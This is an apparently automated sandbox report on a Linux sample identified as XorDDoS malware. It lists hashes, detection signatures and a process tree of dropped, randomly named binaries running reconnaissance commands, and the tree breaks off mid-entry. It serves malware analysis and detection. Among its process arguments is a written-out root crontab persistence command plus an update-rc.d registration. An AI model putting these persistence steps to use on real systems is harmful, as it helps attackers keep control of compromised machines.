Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
1.elf

Overview

General Information

Sample Name:1.elf
Analysis ID:1332894
MD5:ff1a3683a5ad87f88858e92fbcf1ae57
SHA1:ce220486f7d4723406582f8496e8483bcc546beb
SHA256:d2d0a9fc3491d0689529b251d666f36b739acfbf4f7fe8190b6ebabb887b7154
Tags:elf
Infos:

Detection

XorDDoS
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Yara detected XorDDoS Bot
Snort IDS alert for network traffic
Sample tries to persist itself using System V runlevels
Machine Learning detection for dropped file
Sample tries to persist itself using cron
Drops files in suspicious directories
Sample deletes itself
Machine Learning detection for sample
Writes ELF files to disk
Yara signature match
Drops files with innocent-looking names
PID-file does not contain an ASCII number
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Sample and/or dropped files contains symbols with suspicious names
Reads CPU information from /proc indicative of miner or evasive malware
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox Version:38.0.0 Ammolite
Analysis ID:1332894
Start date and time:2023-10-26 20:30:08 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 37s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:1.elf
Detection:MAL
Classification:mal100.troj.evad.linELF@0/19@10/0
  • VT rate limit hit for: 1.elf
Command:/tmp/1.elf
PID:6204
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • 1.elf (PID: 6204, Parent: 6121, MD5: ff1a3683a5ad87f88858e92fbcf1ae57) Arguments: /tmp/1.elf
    • 1.elf New Fork (PID: 6205, Parent: 6204)
      • 1.elf New Fork (PID: 6206, Parent: 6205)
        • 1.elf New Fork (PID: 6207, Parent: 6206)
      • 1.elf New Fork (PID: 6208, Parent: 6205)
        • 1.elf New Fork (PID: 6209, Parent: 6208)
        • update-rc.d (PID: 6209, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d 1.elf defaults
          • systemctl (PID: 6215, Parent: 6209, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • 1.elf New Fork (PID: 6210, Parent: 6205)
      • sh (PID: 6210, Parent: 6205, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
        • sh New Fork (PID: 6211, Parent: 6210)
        • sed (PID: 6211, Parent: 6210, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
      • 1.elf New Fork (PID: 6238, Parent: 6205)
        • 1.elf New Fork (PID: 6239, Parent: 6238)
        • ccxfvtbhgr (PID: 6239, Parent: 6238, MD5: 6a5eca188339a325e9ac1189dbb89376) Arguments: /usr/bin/ccxfvtbhgr su 6205
      • 1.elf New Fork (PID: 6241, Parent: 6205)
        • 1.elf New Fork (PID: 6242, Parent: 6241)
        • ccxfvtbhgr (PID: 6242, Parent: 6241, MD5: 6a5eca188339a325e9ac1189dbb89376) Arguments: /usr/bin/ccxfvtbhgr "netstat -antop" 6205
      • 1.elf New Fork (PID: 6244, Parent: 6205)
        • 1.elf New Fork (PID: 6245, Parent: 6244)
        • ccxfvtbhgr (PID: 6245, Parent: 6244, MD5: 6a5eca188339a325e9ac1189dbb89376) Arguments: /usr/bin/ccxfvtbhgr whoami 6205
      • 1.elf New Fork (PID: 6246, Parent: 6205)
        • 1.elf New Fork (PID: 6247, Parent: 6246)
        • ccxfvtbhgr (PID: 6247, Parent: 6246, MD5: 6a5eca188339a325e9ac1189dbb89376) Arguments: /usr/bin/ccxfvtbhgr ifconfig 6205
      • 1.elf New Fork (PID: 6249, Parent: 6205)
        • 1.elf New Fork (PID: 6250, Parent: 6249)
        • ccxfvtbhgr (PID: 6250, Parent: 6249, MD5: 6a5eca188339a325e9ac1189dbb89376) Arguments: /usr/bin/ccxfvtbhgr "netstat -antop" 6205
      • 1.elf New Fork (PID: 6257, Parent: 6205)
        • 1.elf New Fork (PID: 6258, Parent: 6257)
        • ezztyrfjzf (PID: 6258, Parent: 6257, MD5: 9e1504dcb6964dbc17834520c7a967c0) Arguments: /usr/bin/ezztyrfjzf "cat resolv.conf" 6205
      • 1.elf New Fork (PID: 6260, Parent: 6205)
        • 1.elf New Fork (PID: 6261, Parent: 6260)
        • ezztyrfjzf (PID: 6261, Parent: 6260, MD5: 9e1504dcb6964dbc17834520c7a967c0) Arguments: /usr/bin/ezztyrfjzf ifconfig 6205
      • 1.elf New Fork (PID: 6263, Parent: 6205)
        • 1.elf New Fork (PID: 6264, Parent: 6263)
        • ezztyrfjzf (PID: 6264, Parent: 6263, MD5: 9e1504dcb6964dbc17834520c7a967c0) Arguments: /usr/bin/ezztyrfjzf ls 6205
      • 1.elf New Fork (PID: 6265, Parent: 6205)
        • 1.elf New Fork (PID: 6266, Parent: 6265)
        • ezztyrfjzf (PID: 6266, Parent: 6265, MD5: 9e1504dcb6964dbc17834520c7a967c0) Arguments: /usr/bin/ezztyrfjzf "ps -ef" 6205
      • 1.elf New Fork (PID: 6268, Parent: 6205)
        • 1.elf New Fork (PID: 6269, Parent: 6268)
        • ezztyrfjzf (PID: 6269, Parent: 6268, MD5: 9e1504dcb6964dbc17834520c7a967c0) Arguments: /usr/bin/ezztyrfjzf "netstat -antop" 6205
      • 1.elf New Fork (PID: 6274, Parent: 6205)
        • 1.elf New Fork (PID: 6275, Parent: 6274)
        • dyuvutukki (PID: 6275, Parent: 6274, MD5: 0aca8cf23a8c3e87b13a9c7043110017) Arguments: /usr/bin/dyuvutukki "echo \"find\"" 6205
      • 1.elf New Fork (PID: 6277, Parent: 6205)
        • 1.elf New Fork (PID: 6278, Parent: 6277)
        • dyuvutukki (PID: 6278, Parent: 6277, MD5: 0aca8cf23a8c3e87b13a9c7043110017) Arguments: /usr/bin/dyuvutukki "cat resolv.conf" 6205
      • 1.elf New Fork (PID: 6279, Parent: 6205)
        • 1.elf New Fork (PID: 6281, Parent: 6279)
        • dyuvutukki (PID: 6281, Parent: 6279, MD5: 0aca8cf23a8c3e87b13a9c7043110017) Arguments: /usr/bin/dyuvutukki "ifconfig eth0" 6205
      • 1.elf New Fork (PID: 6282, Parent: 6205)
        • 1.elf New Fork (PID: 6284, Parent: 6282)
        • dyuvutukki (PID: 6284, Parent: 6282, MD5: 0aca8cf23a8c3e87b13a9c7043110017) Arguments: /usr/bin/dyuvutukki id 6205
      • 1.elf New Fork (PID: 6285, Parent: 6205)
        • 1.elf New Fork (PID: 6286, Parent: 6285)
        • dyuvutukki (PID: 6286, Parent: 6285, MD5: 0aca8cf23a8c3e87b13a9c7043110017) Arguments: /usr/bin/dyuvutukki uptime 6205
      • 1.elf New Fork (PID: 6312, Parent: 6205)
        • 1.elf New Fork (PID: 6313, Parent: 6312)
        • vapcvdizxx (PID: 6313, Parent: 6312, MD5: a5394a1ee3b201dfd0198300b6604608) Arguments: /usr/bin/vapcvdizxx "route -n" 6205
      • 1.elf New Fork (PID: 6315, Parent: 6205)
        • 1.elf New Fork (PID: 6316, Parent: 6315)
        • vapcvdizxx (PID: 6316, Parent: 6315, MD5: a5394a1ee3b201dfd0198300b6604608) Arguments: /usr/bin/vapcvdizxx top 6205
      • 1.elf New Fork (PID: 6317, Parent: 6205)
        • 1.elf New Fork (PID: 6318, Parent: 6317)
        • vapcvdizxx (PID: 6318, Parent: 6317, MD5: a5394a1ee3b201dfd0198300b6604608) Arguments: /usr/bin/vapcvdizxx su 6205
      • 1.elf New Fork (PID: 6320, Parent: 6205)
        • 1.elf New Fork (PID: 6321, Parent: 6320)
        • vapcvdizxx (PID: 6321, Parent: 6320, MD5: a5394a1ee3b201dfd0198300b6604608) Arguments: /usr/bin/vapcvdizxx "echo \"find\"" 6205
      • 1.elf New Fork (PID: 6323, Parent: 6205)
        • 1.elf New Fork (PID: 6324, Parent: 6323)
        • vapcvdizxx (PID: 6324, Parent: 6323, MD5: a5394a1ee3b201dfd0198300b6604608) Arguments: /usr/bin/vapcvdizxx top 6205
      • 1.elf New Fork (PID: 6329, Parent: 6205)
        • 1.elf New Fork (PID: 6330, Parent: 6329)
        • lkzqkklpfr (PID: 6330, Parent: 6329, MD5: 26d5465cc1a2caff5bb4ee89004cbcae) Arguments: /usr/bin/lkzqkklpfr "cd /etc" 6205
      • 1.elf New Fork (PID: 6332, Parent: 6205)
        • 1.elf New Fork (PID: 6333, Parent: 6332)
        • lkzqkklpfr (PID: 6333, Parent: 6332, MD5: 26d5465cc1a2caff5bb4ee89004cbcae) Arguments: /usr/bin/lkzqkklpfr whoami 6205
      • 1.elf New Fork (PID: 6335, Parent: 6205)
        • 1.elf New Fork (PID: 6336, Parent: 6335)
        • lkzqkklpfr (PID: 6336, Parent: 6335, MD5: 26d5465cc1a2caff5bb4ee89004cbcae) Arguments: /usr/bin/lkzqkklpfr who 6205
      • 1.elf New Fork (PID: 6337, Parent: 6205)
        • 1.elf New Fork (PID: 6338, Parent: 6337)
        • lkzqkklpfr (PID: 6338, Parent: 6337, MD5: 26d5465cc1a2caff5bb4ee89004cbcae) Arguments: /usr/bin/lkzqkklpfr ifconfig 6205
      • 1.elf New Fork (PID: 6340, Parent: 6205)
        • 1.elf New Fork (PID: 6341, Parent: 6340)
        • lkzqkklpfr (PID: 6341, Parent: 6340, MD5: 26d5465cc1a2caff5bb4ee89004cbcae) Arguments: /usr/bin/lkzqkklpfr "ls -la" 6205
      • 1.elf New Fork (PID: 6346, Parent: 6205)
        • 1.elf New Fork (PID: 6347, Parent: 6346)
        • cpbnjarskl (PID: 6347, Parent: 6346, MD5: bdf7e50117e6bb11039b3f114d7da203) Arguments: /usr/bin/cpbnjarskl "ps -ef" 6205
      • 1.elf New Fork (PID: 6349, Parent: 6205)
        • 1.elf New Fork (PID: 6350, Parent: 6349)
        • cpbnjarskl (PID: 6350, Parent: 6349, MD5: bdf7e50117e6bb11039b3f114d7da203) Arguments: /usr/bin/cpbnjarskl who 6205
      • 1.elf New Fork (PID: 6351, Parent: 6205)
        • 1.elf New Fork (PID: 6353, Parent: 6351)
        • cpbnjarskl (PID: 6353, Parent: 6351, MD5: bdf7e50117e6bb11039b3f114d7da203) Arguments: /usr/bin/cpbnjarskl bash 6205
      • 1.elf New Fork (PID: 6354, Parent: 6205)
        • 1.elf New Fork (PID: 6355, Parent: 6354)
        • cpbnjarskl (PID: 6355, Parent: 6354, MD5: bdf7e50117e6bb11039b3f114d7da203) Arguments: /usr/bin/cpbnjarskl ls 6205
      • 1.elf New Fork (PID: 6357, Parent: 6205)
        • 1.elf New Fork (PID: 6358, Parent: 6357)
        • cpbnjarskl (PID: 6358, Parent: 6357, MD5: bdf7e50117e6bb11039b3f114d7da203) Arguments: /usr/bin/cpbnjarskl id 6205
      • 1.elf New Fork (PID: 6363, Parent: 6205)
        • 1.elf New Fork (PID: 6364, Parent: 6363)
        • uaewjndswe (PID: 6364, Parent: 6363, MD5: 042d91770189023b9e7a41c9db18e788) Arguments: /usr/bin/uaewjndswe "route -n" 6205
      • 1.elf New Fork (PID: 6366, Parent: 6205)
        • 1.elf New Fork (PID: 6367, Parent: 6366)
        • uaewjndswe (PID: 6367, Parent: 6366, MD5: 042d91770189023b9e7a41c9db18e788) Arguments: /usr/bin/uaewjndswe id 6205
      • 1.elf New Fork (PID: 6368, Parent: 6205)
        • 1.elf New Fork (PID: 6370, Parent: 6368)
        • uaewjndswe (PID: 6370, Parent: 6368, MD5: 042d91770189023b9e7a41c9db18e788) Arguments: /usr/bin/uaewjndswe ifconfig 6205
      • 1.elf New Fork (PID: 6371, Parent: 6205)
        • 1.elf New Fork (PID: 6372, Parent: 6371)
        • uaewjndswe (PID: 6372, Parent: 6371, MD5: 042d91770189023b9e7a41c9db18e788) Arguments: /usr/bin/uaewjndswe "cd /etc" 6205
      • 1.elf New Fork (PID: 6374, Parent: 6205)
        • 1.elf New Fork (PID: 6375, Parent: 6374)
        • uaewjndswe (PID: 6375, Parent: 6374, MD5: 042d91770189023b9e7a41c9db18e788) Arguments: /usr/bin/uaewjndswe uptime 6205
      • 1.elf New Fork (PID: 6382, Parent: 6205)
        • 1.elf New Fork (PID: 6383, Parent: 6382)
        • efgdvbpuxx (PID: 6383, Parent: 6382, MD5: 5adf54da233ddd71999a30ae5852d13e) Arguments: /usr/bin/efgdvbpuxx "cat resolv.conf" 6205
      • 1.elf New Fork (PID: 6385, Parent: 6205)
        • 1.elf New Fork (PID: 6386, Parent: 6385)
        • efgdvbpuxx (PID: 6386, Parent: 6385, MD5: 5adf54da233ddd71999a30ae5852d13e) Arguments: /usr/bin/efgdvbpuxx pwd 6205
      • 1.elf New Fork (PID: 6388, Parent: 6205)
        • 1.elf New Fork (PID: 6389, Parent: 6388)
        • efgdvbpuxx (PID: 6389, Parent: 6388, MD5: 5adf54da233ddd71999a30ae5852d13e) Arguments: /usr/bin/efgdvbpuxx "ps -ef" 6205
      • 1.elf New Fork (PID: 6390, Parent: 6205)
        • 1.elf New Fork (PID: 6391, Parent: 6390)
        • efgdvbpuxx (PID: 6391, Parent: 6390, MD5: 5adf54da233ddd71999a30ae5852d13e) Arguments: /usr/bin/efgdvbpuxx top 6205
      • 1.elf New Fork (PID: 6393, Parent: 6205)
        • 1.elf New Fork (PID: 6394, Parent: 6393)
        • efgdvbpuxx (PID: 6394, Parent: 6393, MD5: 5adf54da233ddd71999a30ae5852d13e) Arguments: /usr/bin/efgdvbpuxx whoami 6205
      • 1.elf New Fork (PID: 6402, Parent: 6205)
        • 1.elf New Fork (PID: 6403, Parent: 6402)
        • nxattrsdxm (PID: 6403, Parent: 6402, MD5: 25b1b59dad8e150a80d50015eb75bd53) Arguments: /usr/bin/nxattrsdxm pwd 6205
      • 1.elf New Fork (PID: 6405, Parent: 6205)
        • 1.elf New Fork (PID: 6406, Parent: 6405)
        • nxattrsdxm (PID: 6406, Parent: 6405, MD5: 25b1b59dad8e150a80d50015eb75bd53) Arguments: /usr/bin/nxattrsdxm "netstat -an" 6205
      • 1.elf New Fork (PID: 6408, Parent: 6205)
        • 1.elf New Fork (PID: 6409, Parent: 6408)
        • nxattrsdxm (PID: 6409, Parent: 6408, MD5: 25b1b59dad8e150a80d50015eb75bd53) Arguments: /usr/bin/nxattrsdxm ls 6205
      • 1.elf New Fork (PID: 6411, Parent: 6205)
        • 1.elf New Fork (PID: 6412, Parent: 6411)
        • nxattrsdxm (PID: 6412, Parent: 6411, MD5: 25b1b59dad8e150a80d50015eb75bd53) Arguments: /usr/bin/nxattrsdxm "netstat -an" 6205
      • 1.elf New Fork (PID: 6414, Parent: 6205)
        • 1.elf New Fork (PID: 6415, Parent: 6414)
        • nxattrsdxm (PID: 6415, Parent: 6414, MD5: 25b1b59dad8e150a80d50015eb75bd53) Arguments: /usr/bin/nxattrsdxm "cd /etc" 6205
      • 1.elf New Fork (PID: 6419, Parent: 6205)
        • 1.elf New Fork (PID: 6420, Parent: 6419)
        • bjhrrojebv (PID: 6420, Parent: 6419, MD5: 305f5484460feb573c4a06d56e6ac96a) Arguments: /usr/bin/bjhrrojebv who 6205
      • 1.elf New Fork (PID: 6422, Parent: 6205)
        • 1.elf New Fork (PID: 6423, Parent: 6422)
        • bjhrrojebv (PID: 6423, Parent: 6422, MD5: 305f5484460feb573c4a06d56e6ac96a) Arguments: /usr/bin/bjhrrojebv uptime 6205
      • 1.elf New Fork (PID: 6424, Parent: 6205)
        • 1.elf New Fork (PID: 6425, Parent: 6424)
        • bjhrrojebv (PID: 6425, Parent: 6424, MD5: 305f5484460feb573c4a06d56e6ac96a) Arguments: /usr/bin/bjhrrojebv "ls -la" 6205
      • 1.elf New Fork (PID: 6427, Parent: 6205)
        • 1.elf New Fork (PID: 6428, Parent: 6427)
        • bjhrrojebv (PID: 6428, Parent: 6427, MD5: 305f5484460feb573c4a06d56e6ac96a) Arguments: /usr/bin/bjhrrojebv top 6205
      • 1.elf New Fork (PID: 6430, Parent: 6205)
        • 1.elf New Fork (PID: 6431, Parent: 6430)
        • bjhrrojebv (PID: 6431, Parent: 6430, MD5: 305f5484460feb573c4a06d56e6ac96a) Arguments: /usr/bin/bjhrrojebv gnome-terminal 6205
      • 1.elf New Fork (PID: 6436, Parent: 6205)
        • 1.elf New Fork (PID: 6437, Parent: 6436)
        • vlteqhfomz (PID: 6437, Parent: 6436, MD5: 41fc2d5615191266df1f6ab89f56e741) Arguments: /usr/bin/vlteqhfomz "netstat -an" 6205
      • 1.elf New Fork (PID: 6439, Parent: 6205)
        • 1.elf New Fork (PID: 6440, Parent: 6439)
        • vlteqhfomz (PID: 6440, Parent: 6439, MD5: 41fc2d5615191266df1f6ab89f56e741) Arguments: /usr/bin/vlteqhfomz uptime 6205
      • 1.elf New Fork (PID: 6441, Parent: 6205)
        • 1.elf New Fork (PID: 6442, Parent: 6441)
        • vlteqhfomz (PID: 6442, Parent: 6441, MD5: 41fc2d5615191266df1f6ab89f56e741) Arguments: /usr/bin/vlteqhfomz "grep \"A\"" 6205
      • 1.elf New Fork (PID: 6444, Parent: 6205)
        • 1.elf New Fork (PID: 6445, Parent: 6444)
        • vlteqhfomz (PID: 6445, Parent: 6444, MD5: 41fc2d5615191266df1f6ab89f56e741) Arguments: /usr/bin/vlteqhfomz su 6205
      • 1.elf New Fork (PID: 6447, Parent: 6205)
        • 1.elf New Fork (PID: 6448, Parent: 6447)
        • vlteqhfomz (PID: 6448, Parent: 6447, MD5: 41fc2d5615191266df1f6ab89f56e741) Arguments: /usr/bin/vlteqhfomz id 6205
      • 1.elf New Fork (PID: 6453, Parent: 6205)
        • 1.elf New Fork (PID: 6454, Parent: 6453)
        • wxysocrflf (PID: 6454, Parent: 6453, MD5: 4af31d012bbcff0a3da05560012a0665) Arguments: /usr/bin/wxysocrflf id 6205
      • 1.elf New Fork (PID: 6456, Parent: 6205)
        • 1.elf New Fork (PID: 6457, Parent: 6456)
        • wxysocrflf (PID: 6457, Parent: 6456, MD5: 4af31d012bbcff0a3da05560012a0665) Arguments: /usr/bin/wxysocrflf "echo \"find\"" 6205
      • 1.elf New Fork (PID: 6458, Parent: 6205)
        • 1.elf New Fork (PID: 6460, Parent: 6458)
        • wxysocrflf (PID: 6460, Parent: 6458, MD5: 4af31d012bbcff0a3da05560012a0665) Arguments: /usr/bin/wxysocrflf bash 6205
      • 1.elf New Fork (PID: 6461, Parent: 6205)
        • 1.elf New Fork (PID: 6462, Parent: 6461)
        • wxysocrflf (PID: 6462, Parent: 6461, MD5: 4af31d012bbcff0a3da05560012a0665) Arguments: /usr/bin/wxysocrflf top 6205
      • 1.elf New Fork (PID: 6464, Parent: 6205)
        • 1.elf New Fork (PID: 6465, Parent: 6464)
        • wxysocrflf (PID: 6465, Parent: 6464, MD5: 4af31d012bbcff0a3da05560012a0665) Arguments: /usr/bin/wxysocrflf id 6205
      • 1.elf New Fork (PID: 6470, Parent: 6205)
        • 1.elf New Fork (PID: 6471, Parent: 6470)
        • ssrfvzfvpk (PID: 6471, Parent: 6470, MD5: c7f6b1948208a5e292a0ce152567dd8f) Arguments: /usr/bin/ssrfvzfvpk pwd 6205
      • 1.elf New Fork (PID: 6473, Parent: 6205)
        • 1.elf New Fork (PID: 6474, Parent: 6473)
        • ssrfvzfvpk (PID: 6474, Parent: 6473, MD5: c7f6b1948208a5e292a0ce152567dd8f) Arguments: /usr/bin/ssrfvzfvpk "ifconfig eth0" 6205
      • 1.elf New Fork (PID: 6475, Parent: 6205)
        • 1.elf New Fork (PID: 6477, Parent: 6475)
        • ssrfvzfvpk (PID: 6477, Parent: 6475, MD5: c7f6b1948208a5e292a0ce152567dd8f) Arguments: /usr/bin/ssrfvzfvpk top 6205
      • 1.elf New Fork (PID: 6478, Parent: 6205)
        • 1.elf New Fork (PID: 6479, Parent: 6478)
        • ssrfvzfvpk (PID: 6479, Parent: 6478, MD5: c7f6b1948208a5e292a0ce152567dd8f) Arguments: /usr/bin/ssrfvzfvpk ifconfig 6205
      • 1.elf New Fork (PID: 6482, Parent: 6205)
        • 1.elf New Fork (PID: 6483, Parent: 6482)
        • ssrfvzfvpk (PID: 6483, Parent: 6482, MD5: c7f6b1948208a5e292a0ce152567dd8f) Arguments: /usr/bin/ssrfvzfvpk "route -n" 6205
      • 1.elf New Fork (PID: 6488, Parent: 6205)
        • 1.elf New Fork (PID: 6489, Parent: 6488)
        • bhmsjmfdgk (PID: 6489, Parent: 6488, MD5: 78478a175b52118257c1908b16bd07f5) Arguments: /usr/bin/bhmsjmfdgk "sleep 1" 6205
      • 1.elf New Fork (PID: 6491, Parent: 6205)
        • 1.elf New Fork (PID: 6492, Parent: 6491)
        • bhmsjmfdgk (PID: 6492, Parent: 6491, MD5: 78478a175b52118257c1908b16bd07f5) Arguments: /usr/bin/bhmsjmfdgk whoami 6205
      • 1.elf New Fork (PID: 6494, Parent: 6205)
        • 1.elf New Fork (PID: 6495, Parent: 6494)
        • bhmsjmfdgk (PID: 6495, Parent: 6494, MD5: 78478a175b52118257c1908b16bd07f5) Arguments: /usr/bin/bhmsjmfdgk "sleep 1" 6205
      • 1.elf New Fork (PID: 6496, Parent: 6205)
        • 1.elf New Fork (PID: 6498, Parent: 6496)
        • bhmsjmfdgk (PID: 6498, Parent: 6496, MD5: 78478a175b52118257c1908b16bd07f5) Arguments: /usr/bin/bhmsjmfdgk gnome-terminal 6205
      • 1.elf New Fork (PID: 6499, Parent: 6205)
        • 1.elf New Fork (PID: 6500, Parent: 6499)
        • bhmsjmfdgk (PID: 6500, Parent: 6499, MD5: 78478a175b52118257c1908b16bd07f5) Arguments: /usr/bin/bhmsjmfdgk pwd 6205
      • 1.elf New Fork (PID: 6505, Parent: 6205)
        • 1.elf New Fork (PID: 6506, Parent: 6505)
        • ctjziyscga (PID: 6506, Parent: 6505, MD5: be0d21af660064bc9a4c5c1292894f1d) Arguments: /usr/bin/ctjziyscga "ls -la" 6205
      • 1.elf New Fork (PID: 6508, Parent: 6205)
        • 1.elf New Fork (PID: 6509, Parent: 6508)
        • ctjziyscga (PID: 6509, Parent: 6508, MD5: be0d21af660064bc9a4c5c1292894f1d) Arguments: /usr/bin/ctjziyscga pwd 6205
      • 1.elf New Fork (PID: 6510, Parent: 6205)
        • 1.elf New Fork (PID: 6512, Parent: 6510)
        • ctjziyscga (PID: 6512, Parent: 6510, MD5: be0d21af660064bc9a4c5c1292894f1d) Arguments: /usr/bin/ctjziyscga "netstat -antop" 6205
      • 1.elf New Fork (PID: 6513, Parent: 6205)
        • 1.elf New Fork (PID: 6514, Parent: 6513)
        • ctjziyscga (PID: 6514, Parent: 6513, MD5: be0d21af660064bc9a4c5c1292894f1d) Arguments: /usr/bin/ctjziyscga id 6205
      • 1.elf New Fork (PID: 6516, Parent: 6205)
        • 1.elf New Fork (PID: 6517, Parent: 6516)
        • ctjziyscga (PID: 6517, Parent: 6516, MD5: be0d21af660064bc9a4c5c1292894f1d) Arguments: /usr/bin/ctjziyscga "ifconfig eth0" 6205
      • 1.elf New Fork (PID: 6524, Parent: 6205)
        • 1.elf New Fork (PID: 6525, Parent: 6524)
        • ggufoivoip (PID: 6525, Parent: 6524, MD5: 9b2c11b824ddfcc1d5f7ae5bc4b60f09) Arguments: /usr/bin/ggufoivoip "echo \"find\"" 6205
      • 1.elf New Fork (PID: 6527, Parent: 6205)
        • 1.elf New Fork (PID: 6528, Parent: 6527)
        • ggufoivoip (PID: 6528, Parent: 6527, MD5: 9b2c11b824ddfcc1d5f7ae5bc4b60f09) Arguments: /usr/bin/ggufoivoip pwd 6205
      • 1.elf New Fork (PID: 6529, Parent: 6205)
        • 1.elf New Fork (PID: 6531, Parent: 6529)
        • ggufoivoip (PID: 6531, Parent: 6529, MD5: 9b2c11b824ddfcc1d5f7ae5bc4b60f09) Arguments: /usr/bin/ggufoivoip "netstat -antop" 6205
      • 1.elf New Fork (PID: 6533, Parent: 6205)
        • 1.elf New Fork (PID: 6534, Parent: 6533)
        • ggufoivoip (PID: 6534, Parent: 6533, MD5: 9b2c11b824ddfcc1d5f7ae5bc4b60f09) Arguments: /usr/bin/ggufoivoip "echo \"find\"" 6205
      • 1.elf New Fork (PID: 6535, Parent: 6205)
        • 1.elf New Fork (PID: 6537, Parent: 6535)
        • ggufoivoip (PID: 6537, Parent: 6535, MD5: 9b2c11b824ddfcc1d5f7ae5bc4b60f09) Arguments: /usr/bin/ggufoivoip "netstat -an" 6205
      • 1.elf New Fork (PID: 6542, Parent: 6205)
        • 1.elf New Fork (PID: 6543, Parent: 6542)
        • gvjfjjanun (PID: 6543, Parent: 6542, MD5: 4780b1384292ab14583c4f650cf92dc1) Arguments: /usr/bin/gvjfjjanun "echo \"find\"" 6205
      • 1.elf New Fork (PID: 6545, Parent: 6205)
        • 1.elf New Fork (PID: 6546, Parent: 6545)
        • gvjfjjanun (PID: 6546, Parent: 6545, MD5: 4780b1384292ab14583c4f650cf92dc1) Arguments: /usr/bin/gvjfjjanun "cd /etc" 6205
      • 1.elf New Fork (PID: 6548, Parent: 6205)
        • 1.elf New Fork (PID: 6549, Parent: 6548)
        • gvjfjjanun (PID: 6549, Parent: 6548, MD5: 4780b1384292ab14583c4f650cf92dc1) Arguments: /usr/bin/gvjfjjanun id 6205
      • 1.elf New Fork (PID: 6550, Parent: 6205)
        • 1.elf New Fork (PID: 6551, Parent: 6550)
        • gvjfjjanun (PID: 6551, Parent: 1860, MD5: 4780b1384292ab14583c4f650cf92dc1) Arguments: /usr/bin/gvjfjjanun "netstat -antop" 6205
      • 1.elf New Fork (PID: 6553, Parent: 6205)
        • 1.elf New Fork (PID: 6554, Parent: 6553)
        • gvjfjjanun (PID: 6554, Parent: 1860, MD5: 4780b1384292ab14583c4f650cf92dc1) Arguments: /usr/bin/gvjfjjanun uptime 6205
      • 1.elf New Fork (PID: 6559, Parent: 6205)
        • 1.elf New Fork (PID: 6560, Parent: 6559)
        • fubjkoogoo (PID: 6560, Parent: 6559, MD5: 0ea6b59dfc99f2b10cc3bdc90a93485b) Arguments: /usr/bin/fubjkoogoo who 6205
      • 1.elf New Fork (PID: 6561, Parent: 6205)
        • 1.elf New Fork (PID: 6562, Parent: 6561)
        • fubjkoogoo (PID: 6562, Parent: 1860, MD5: 0ea6b59dfc99f2b10cc3bdc90a93485b) Arguments: /usr/bin/fubjkoogoo "cd /etc" 6205
      • 1.elf New Fork (PID: 6563, Parent: 6205)
        • 1.elf New Fork (PID: 6565, Parent: 6563)
        • fubjkoogoo (PID: 6565, Parent: 1860, MD5: 0ea6b59dfc99f2b10cc3bdc90a93485b) Arguments: /usr/bin/fubjkoogoo "echo \"find\"" 6205
      • 1.elf New Fork (PID: 6566, Parent: 6205)
        • 1.elf New Fork (PID: 6567, Parent: 6566)
        • fubjkoogoo (PID: 6567, Parent: 1860, MD5: 0ea6b59dfc99f2b10cc3bdc90a93485b) Arguments: /usr/bin/fubjkoogoo bash 6205
      • 1.elf New Fork (PID: 6570, Parent: 6205)
        • 1.elf New Fork (PID: 6571, Parent: 6570)
        • fubjkoogoo (PID: 6571, Parent: 1860, MD5: 0ea6b59dfc99f2b10cc3bdc90a93485b) Arguments: /usr/bin/fubjkoogoo "ps -ef" 6205
      • 1.elf New Fork (PID: 6576, Parent: 6205)
        • 1.elf New Fork (PID: 6577, Parent: 6576)
        • ptcfhyyirf (PID: 6577, Parent: 6576, MD5: 50b1c82c7fcc2c240a21aebd9dea3c69) Arguments: /usr/bin/ptcfhyyirf "grep \"A\"" 6205
      • 1.elf New Fork (PID: 6578, Parent: 6205)
        • 1.elf New Fork (PID: 6579, Parent: 6578)
        • ptcfhyyirf (PID: 6579, Parent: 1860, MD5: 50b1c82c7fcc2c240a21aebd9dea3c69) Arguments: /usr/bin/ptcfhyyirf bash 6205
      • 1.elf New Fork (PID: 6581, Parent: 6205)
        • 1.elf New Fork (PID: 6582, Parent: 6581)
        • ptcfhyyirf (PID: 6582, Parent: 1860, MD5: 50b1c82c7fcc2c240a21aebd9dea3c69) Arguments: /usr/bin/ptcfhyyirf "netstat -antop" 6205
      • 1.elf New Fork (PID: 6583, Parent: 6205)
        • 1.elf New Fork (PID: 6585, Parent: 6583)
        • ptcfhyyirf (PID: 6585, Parent: 1860, MD5: 50b1c82c7fcc2c240a21aebd9dea3c69) Arguments: /usr/bin/ptcfhyyirf "route -n" 6205
      • 1.elf New Fork (PID: 6586, Parent: 6205)
        • 1.elf New Fork (PID: 6587, Parent: 6586)
        • ptcfhyyirf (PID: 6587, Parent: 1860, MD5: 50b1c82c7fcc2c240a21aebd9dea3c69) Arguments: /usr/bin/ptcfhyyirf "route -n" 6205
      • 1.elf New Fork (PID: 6596, Parent: 6205)
        • 1.elf New Fork (PID: 6597, Parent: 6596)
        • bsvlwqppmd (PID: 6597, Parent: 6596, MD5: 205f8a5a8b0d1f6be71274fa6ff34534) Arguments: /usr/bin/bsvlwqppmd who 6205
      • 1.elf New Fork (PID: 6598, Parent: 6205)
        • 1.elf New Fork (PID: 6599, Parent: 6598)
